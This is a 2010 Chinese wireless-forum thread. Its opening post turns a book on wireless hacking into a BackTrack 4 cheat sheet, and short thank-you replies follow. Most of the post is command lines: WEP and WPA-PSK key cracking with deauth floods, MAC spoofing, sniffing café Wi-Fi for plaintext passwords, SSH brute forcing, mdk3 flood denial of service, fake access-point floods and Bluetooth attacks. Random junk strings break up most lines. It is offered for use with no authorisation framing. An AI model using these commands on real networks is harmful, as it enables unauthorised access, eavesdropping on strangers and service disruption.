查看: 10449|回复: 34

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3719

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
TG-NET
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
! D0 v8 E& N; x
# j+ a* h- r0 I1 e, p, t" C4 e* k以下所有操作均在BackTrack 4中进行。
- ~" [4 E/ a, G$ W3 X
* `0 Y, |- F0 m" Q+ O3 y' X  T# G' b
7 f5 l! \; P' b. v1 p) `5 h- A# v/ b无线WEP加密P解:' O0 y) O3 ~% |, r4 I

0 o; D$ D- i7 b* \2 P9 ]/ o0 l6 L注入P解:, L0 h( {# Z; a/ L" ~% s

5 h( l2 F; p4 w* j) o1 X% G, z! Fifconfig
. g/ H# ?# L: a0 V" x
$ w7 b+ S) |1 n4 ?) Q6 Q7 c( x. Eifconfig –a
( z: H  ~: X, I( \, e/ Q' E, P' w3 j# B- Z% }! |
ifconfig wlan0(无线网卡) up
  z6 Q% y9 I# N3 D- \0 k5 f. P. w
! c% O5 n* `# f# nairmon-ng start wlan0
. d. Z! o* m0 L& l# ]+ i. X$ ?9 P3 F/ w1 |
airodump-ng mon0. e0 b8 s3 ~* R0 M& l8 W

( G  n/ C; C  ]( O& Dairodump-ng --ivs –w ivsfile –c 频道 mon0或  V& G  _/ p$ c% R, Z

, O6 u$ b, o; v" z7 q) dairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
; N) q' k# o# l, G7 F
; ?" I, q3 U; vaireplay-ng -3 –b BSSID –h Station mon0) i5 v& d# i# K& y; c

# n6 O$ U; b2 ?: F$ G  v0 G+ R2 Daircrack-ng ivsfile-01.ivs$ Y4 V0 X, v1 s/ ^" b
6 c9 C4 @2 _% y9 `6 I5 g/ c. ]
虚连接P解(适用于无客户端连接APP解)
- g7 y* i& @1 z) T0 `5 M" f( i
; e1 r* f! g8 Qifconfig0 W! ]0 u8 O; U& u- U! }

# J& r$ F6 r' {) e' L; U, zifconfig –a
& z; _% K  s( r: G3 i* c4 [: C) M% p# ^1 R3 v) R3 I
ifconfig wlan0(无线网卡) up
/ E7 ^( O8 h4 ~# m+ |$ U
; P) }' W7 E: t, @4 |" |% X! ?" mairmon-ng start wlan09 r' v- Q, h) {' p. D$ c

! P# I6 g$ u1 [4 [7 @airodump-ng mon0  k: @: W8 t+ m1 L- R; P
7 w% c1 N) n# X1 f% Q
airodump-ng --ivs –w ivsfile –c 频道 mon0或
+ @5 @  U9 A$ P( F2 i2 J8 T5 Q( a
0 a/ D8 y9 K4 y9 \' f3 tairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0* ^* S' t- m4 B. i- C6 k

7 \' M, p' }& ?* c7 s9 Aaireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
1 Q6 o& B* Y( B& P6 b# o1 Q; h& `" a9 z4 j
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0  B# Y  A% q# C" {
- A0 Y& g, Q: F7 m. V  E0 }* H, j
aircrack-ng ivsfile-01.ivs! E6 T8 Z8 A/ \5 W4 [- z
  b0 o4 V, N% v4 N# a) `! z
' h+ {; Z4 N/ s# h+ `
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。0 D: P# v' b: r8 ?" T
: K: [3 \, f; W" [8 G) S+ [$ ?
) ]( x+ X, {0 N0 x8 z0 n
WPA-PSKP解
5 }+ R7 i1 k; Q1 A. m( l- e
$ p/ {7 N5 g% Q/ z" N$ s8 B3 w! @7 yifconfig' Y/ w9 i% {0 `- S/ }

$ O$ c3 c4 x3 \2 V5 R" Bifconfig –a! R  h, o1 M1 D! {) [/ \
3 A- A7 g; t3 P8 T+ S) G, h" i
ifconfig wlan0(无线网卡) up1 F4 _; \8 W" ^, V. Z  l

3 Y! ?% ^& H5 V% y- Fairmon-ng start wlan0$ U% h* S! C. G4 z9 H. z
" p3 T% `, \' W
airodump-ng mon0
. L& T: ^; o9 j% k; f+ ~) ?( |1 ?) u+ }+ E+ X/ B, _7 C+ E
airodump-ng –w capfile –c 频道 mon0
% ?( i6 G  a3 E+ x# D5 Y
# J. A* c, T0 G4 \9 L& ?' ^aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包9 ~/ A+ j6 P* H) f4 ~

# a! N8 l  D; Iaircrack-ng –w Dic capfile-01.cap或
) K4 n0 T/ r7 b' d( w
: Z  D. _) ?) Z+ s4 H9 ^cowpatty –f Dic –r capfile-01.cap –s SSID& c: V/ Y0 E  |% R! I3 e6 g

  E' \; I' m. E8 {" m# T& Vcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID4 M+ D2 N0 y0 n1 M0 y( Q
& ~; h/ M( ^5 L" e5 U5 @% E
傻瓜式P解软件SpoonWPA。; r  m* x, ~  f) v4 P
$ d5 I- r6 i# [) D9 `7 A
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst- p! K/ d' \6 @. H2 b) R: Z, G
. D, m/ w$ C# g8 d

- _/ p) w- I1 A" }' w字典文件的生成和上传
! Y) F8 [; y3 v  n. B: f/ w* @4 B4 ]* v; v9 q! t% D- N, ?" |8 K
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。; h5 e& ~( V1 f, I6 h! ?

% X' O6 E% p" u
7 C. o' [: [; o/ o  w5 z3 CBT4下开启Tftp:Services—TFTPD—start TFTPD; f0 `/ I5 p% x8 \
% K  P; G' ?' e, W/ }
在Windows的CMD中运行 tftp –i IP put **.dic3 A2 j* G  @! u7 z7 X

6 j' w) D1 P: }6 d; v
7 j  E- D+ w- |) g8 }  C% cBT4下开启SSH:Services—SSH—start SSH) B/ i% D* e6 _# @6 z

# e- N" p( b* V/ bWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
! B) Y5 d+ a! A6 R
2 E1 `9 P) K; v8 W2 d: ]9 C/ T" ?/ U; P
AP限制MAC时的解决
) t; l7 Z# V& W" K* O8 d$ B8 m) T1 m8 ^* s& z' F+ }
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:; D: J8 h" X  d9 Q$ a8 K2 S
$ s% [$ @# e. ^/ v7 n6 [$ e2 A
ifconfig wlan0 hw ether NewMAC
3 M4 A0 \) P, |' g2 d
/ P* O& u' A$ w  `* z
% B7 p+ F/ d) g关闭SSID广播的AP探测:# G! L' Z6 A* j4 s. m
0 ?6 b8 A9 \9 U  U  I8 b
1.     Deauth攻击:% _7 d4 s3 T5 `# w
; z, e3 p8 M% D1 \% }4 n
airodump-ng mon0% \! X# E: j4 h# ]

" E6 u: i7 N$ e( Taireplay-ng -0 10 –a BSSID –h Station mon0
2 V* B9 u* B* l# w
. Q4 }* l+ S, k6 G2.     抓包分析( [8 Q. f+ W- X$ c: Q' q& Q

# m# @. T) [5 \. F& lOmnipeek1 V' S# y: _) ?8 y  }* T" t3 ]
* D+ I, f& k0 m* L3 u0 h
Tcpdump –n –e –vvv –i 网卡名' @' r. I* w/ i. w4 o, l1 v' R
7 J& u* f% X) b8 Q( U" `
3.     暴力P解1 z1 q9 a1 n1 L4 ?# C

2 S/ c  m! @" ~$ j* v& R2 {Charon 1.1暴力P解0 v% }+ [" V6 r. D+ l4 v1 t

8 U+ W6 r6 N: \* j
. h* Z, G2 w9 m3 `# u. }+ e无线加密数据包的解密3 t7 h, ^" m6 }" J7 ~
& v. V/ m2 L& H) H, @& ~8 s

1 @8 i. ?* n1 f使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。1 p( u+ r& K6 M% T9 O" N; P

+ U$ }! Z" J  M7 KFilterNS     DNS解析数据包
. c: |" u5 _3 K3 O7 i
$ w) _' t1 D$ K( ~) a; wFilter:HTTP    WEB访问数据包
$ u/ k2 D: t+ X0 k; k
9 ?. w8 F# B; M+ N; d# M7 ^5 x7 YFilter:msnms   MSN2 U2 M5 Z) j& F( _  Q) d. b
  J# b0 [; t1 g* u: D! _  H
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。4 H5 Y% l; D0 K- ^" e8 G3 O

$ w- l2 }  ~7 N; ^9 [2 w使用airdecap-ng解密:
# A2 A& \0 Z4 w; f0 I+ ~
. `; I' j, b- Y) B" y. qAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap# r" J- d# x6 U  D& x& L
) O: x; d6 E6 ?& Z: G" C

5 Z  B9 m! N6 O+ `1 g- r咖啡馆中无线数据截取(开放式无加密AP)% p' [" O0 ?& G9 M2 V

- m, x, H& ^4 k1.Airodump-ng –w data –c频道 mon0- ~5 a: h, h; R% n  I" v; G2 v  E

8 z9 p! X: T; q2.使用WireShark打开分析
" R# W8 M8 l5 J4 P) v1 U8 o, K! T" V" G* d/ b" ~

( v0 A! K" k" e3 I- FBT4下的渗透工具:6 S" M/ I. @  C7 |  h- Q6 A- g- c

3 q, H- _# S) z9 @5 Q6 anmap –sP IP/24        判断C段下存活的主机 ! V, _$ y- ^4 x

$ l, q: D+ M2 ^/ @/ `8 {6 lnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
4 @+ b$ g$ v5 e) G1 @* M
) N% _1 z, _0 \/ I0 R4 h6 Unmap –vv –sV IP –p port   指定端口的详细信息。。。
2 U. }5 O  K* g% k- N% g4 s
3 u1 r  e6 v5 {namp –O IP/24    判断主机的系统版本
$ L/ e# o% d" P/ Z" f, H3 C; n+ J# w/ @+ W0 S

- F% F( b  w0 G2 [3 PGUI 版nmap:Zenmap * S0 C, N; C9 O7 l. ~' |

$ D5 I6 R5 b, \8 c5 N/ B
4 r6 ]" P- W6 F, {+ g+ l! yAmap使用:amap –B IP port, S. R# p( [& }( e

" p6 [0 Z: o0 F6 [5 O% UNbtscan(扫描Windows网络NetBios信息):
( j- L7 F: }+ ]8 D: O4 i" d0 w) p0 d1 s- M. j  l8 l
nbtscan –v –s : IP/24
% v$ b  [& `3 i' R3 r- t& S- S- P+ u% c1 f$ g$ K1 [; O: Q) W3 ?
nbtscan –r IP/ N; w/ x  z, r8 R. P6 w
! f: v. K, y/ p1 c7 F& K

% A& n2 ~% \) r9 H4 r: T3 NDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
0 L9 Y$ z# d  y. _) Y3 z: r; J- E& D4 R- Q( J( y

4 H4 F5 g* ]8 C; |8 q5 n( w/ WHydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)3 c9 R- y' t1 j5 N1 C0 Q: M

! U: A( T0 g* C9 ]% h. FBruteSSH: ./bruthe.py –h IP –u Username –d Dic5 d4 }$ b* x$ K3 q; c) I+ D( S

" T3 y0 j& d# _9 ?2 bMetasploit3使用6 w: j4 e" [% M/ r, P' }4 C  A
无线D.0.S# P7 f4 G1 m' P, N6 ?. }

1 a3 W/ I5 d) E  b6 G* u7 Z; M3 s" B! A# v- @( y9 P7 U! m- Q
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)* x( l2 z% W' e9 C" B4 U

" h  |4 R6 V* |8 E; s: J! gairmon-ng start wlan0. O" ?  V, ]# \9 D, ]$ I' i. N

% o- `3 M% S0 P$ q& a7 Y3 tairodump-ng mon00 w) _" \8 ^) U" X

4 m0 K; @% Q+ C( Gmdk3 mon0 a –a BSSID
' _- @9 m: e7 A+ y
$ P, o( d+ _: l; T7 s' ~对所有的AP攻击:mdk3 mon0 a& J# |  K  }3 C- @. C* n) L

5 V. ^6 x$ q* I$ D7 E& z7 e5 @7 d2 a1 `; j! L/ o/ o# m2 E8 \9 \
Deauth Flood 攻击
8 Z7 u, ]- F1 O. O
) q: c; W2 K# g. K% cmdk3 mon0 d –c Channel, O; H8 r% Q: O. e9 h& m8 b

' t# ^9 Q3 e4 X! o: D3 v& c图形化D.O.S攻击:Charon- f) q' v0 S, W7 V+ }8 U6 m

; v  K. m4 [" m0 X; R4 c/ E3 @2 }! n6 y* l  A) R0 w7 R
当受到攻击时,使用Wireshark抓包可以看到异常信息。3 o+ ?! @: D2 ~& S6 [5 Y

7 S7 n6 S, m- m; g! f0 g6 r! q4 r& i+ Y6 Y
WPA-PSK高速P解) G/ b$ e( e' w7 [4 Z
2 x; f: l5 d! |) R
1.       WPA-PSK PMK Hash TablesP解. H; W! w: V0 z1 t$ K2 `; f6 [1 ^. g5 v

( n# o( B: ?: f' F4 h, D; PCowpatty –d HashTable.hash –r ***.cap –s SSID
5 }& U: A5 }) }6 g7 `: A9 E
2 S* B: s1 Z9 c' P& n- mHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
5 g" i: f: \) T2 ]8 I' ^; T
! `. J$ x' Y, z2.       GPU辅助高速P解
, t# k# \0 d3 E4 w0 [5 F+ u2 b, T# H" {: S5 u
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
1 C, E4 L+ y2 f( I) `6 B' |" E) h/ k$ L/ `8 h  U' Q
3.       分布式P解
6 u% O. i( T2 A. `4 C7 _7 {3 L$ r2 p' c+ p  C

6 U: ^& p* s% j: F2 _, vAP的伪造2 C, W9 ^( B2 K. n0 p

, ]5 O. k! @- \* j; \( V9 B5 Q把AP的MAC改成目标AP的MAC
' s6 |* [% ^4 k# m* ~0 w( T% v/ J- F: r  B/ Y% h
网卡软AP
# o0 w& w6 g- _) s6 ^
7 m- ~# b8 D5 K( D$ Z1 A' S3 d6 E1 P" q
伪造大量虚假AP信号:
' V& f( c! n" A( G- Y' J7 {- K' ?1 K. Q( f2 X. C/ M8 \
随机SSID:mdk3 mon0 b –g –c 频道
& x) y! \$ w6 _, v+ k# B0 H- y% Y
7 P/ E2 B: c& R) u指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度; v" `" W, n0 M) B- e. Y- }% \. \
' h" B/ c' I0 Q& f4 z% H8 h% f; j
( e; i* B( g  m' J
War-Driving
) u. b6 H% R" O. ^" t, \" D
  ^6 R) Z# O  X! p热点地图绘制/ A3 A& @+ i7 B
+ ?$ a# R0 j0 s
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
! x$ T+ y8 K- }  v/ V
! c. w$ O* ~; x" \8 e- C1 a# T
1 l9 \4 C( l! s9 FNetstumble1 Y# p' M0 ~# {. Y5 v2 V& }1 v

* n) G: S+ R$ r9 P' C7 y" A* W
9 D9 ^& C/ P# @2 M" ^蓝牙Hacking
. ~% @" c/ i# G9 g' B
/ g6 ?1 @& e2 {% kWindows下的Blue Soleil工具& T: l$ z% ?0 Z. D
) J$ j) n* m; A& v' G6 n' e
BT4:
1 e2 R0 A. x3 n2 r1 a
, E/ Z$ S5 E& R/ M* |0 f% Vhciconfig 查看蓝牙适配器3 u: L) @: i* f6 q' {

# l6 C8 R6 w4 J* ]! R" whciconfig hci0 up 载入蓝牙适配器
5 c4 c' Q, N2 d, I+ G2 I8 w& Q4 l3 f: L
hciconfig hci0 class 蓝牙适配器详细信息0 ?' x; E0 [8 Q- x: [& B. E1 k

5 z4 I1 n8 y4 @. e
! O/ l, O1 X9 }. G7 ]4 Rhcitool(扫描蓝牙)9 y0 r1 }6 y2 B4 n) H

9 t+ L0 E( N7 l% D- O( f9 Ehcitool –i hci0 scan/ i6 @. x% h# k

" m+ U% G6 L4 Q' D& G7 PBTscanner(扫描蓝牙)
% p. z) e- _7 f' z( X& H" C7 ]3 H. ]& }; I' R

# p( w/ N# G+ d% G蓝牙攻击:
1 R3 }9 Y' Z9 [% Q) O) g& q% z4 ~5 j/ P
BlueBugging (适用于BlueTooth V1.1的手机); t+ A# F- p/ t: i+ s
5 A. q# T# t1 k2 z; ^* n
Bluebugger工具:
* Z( ~. s" J# d0 Q6 R, }
4 h5 i0 I0 O) k; jBulebugger –a HD_Addr info
9 n. q6 P! {  V  j
! y% i1 \" _3 t+ F$ R
7 i: N$ @, x6 j* R2 jBlueJacking
. g5 q- g* ^- [- R2 T  q2 X* y5 q/ a
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
* t+ N7 t4 l( ?2 C+ N0 t$ \  `7 l& H+ j: b
( t2 I/ C) _' ^% v$ C$ l7 V
HD_Addr修改:  m& a4 t+ D8 m! V! }

  e$ A) F. \  XBdaddr工具
. m9 P8 h% B/ f0 X/ {# L1 j' l/ P+ F! ?8 Z- i+ x( o
bdaddr –i 蓝牙设备名 新HD_addr3 q) u5 g# f7 x5 H2 X. B# }
! N3 v  \) Q) F& u1 R" k  e8 o

* i- L% M! p; I$ Z8 i# d8 b蓝牙D.O.S
" e) z! S7 f; U4 u" t/ o
+ j3 \- }, O: D9 ?7 El2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务0 L& |- t; |# ?

$ [" `4 q% r! w+ g% {+ Zhciconfig( k# o9 j( ?% t" q+ Q3 V0 O
+ o6 Q8 E$ e. P& @% \: a0 M
hciconfig hci0 up# c( X. d, ?0 U+ L3 l! \

5 h7 P9 x# c" z/ N  qhcitool –i hci0 scan  y; ?5 e! a$ j+ e7 W2 U
8 r0 A, J) `6 j3 h5 g
l2ping –s 10000 –目标MAC
! i: F# q# `8 l) q9 n: j! v$ c) k* e5 {
3 w4 D8 w. U+ G* `8 a7 z  T7 Q( h% `$ f; w
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
2 T) l/ J( {- `, i  q; R
5 n( t$ W4 B( q0 W* r5 q7 p./fang –r ************-############ -s
; q/ W& p) M" C7 T- [; m
" r" U% X; J) i# Y4 f  `! A3 H暴力P解************-############的蓝牙设备4 m. f: y7 ^( D- L

( S8 H3 }) L% a3 R3 B+ a./fang –l 各厂商BD_Addr分配
1 m1 K" W7 J% P* e! a6 e# X
; P  R+ E$ Y# [: n5 w- N) O7 s, U0 g9 o9 ]$ }# y# k4 V7 ^
WifiZoo使用
; k* N  \( J2 \% X5 F$ G& {! [. h! Z& A4 N; Q6 f
./wifizoo.py –c Capfile0 }3 H* l3 R- x3 k$ `
8 C9 S" r0 H. ]' V# W! Y) F9 x
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

907

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。2 P/ v6 X3 O9 i, ~5 O3 _& x
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
" k" \$ v( m1 C9 i呵呵 其实也不贵 21块 快递再一点
8 V& k& x6 a! y) }8 Z我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2016-6-26 23:30

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表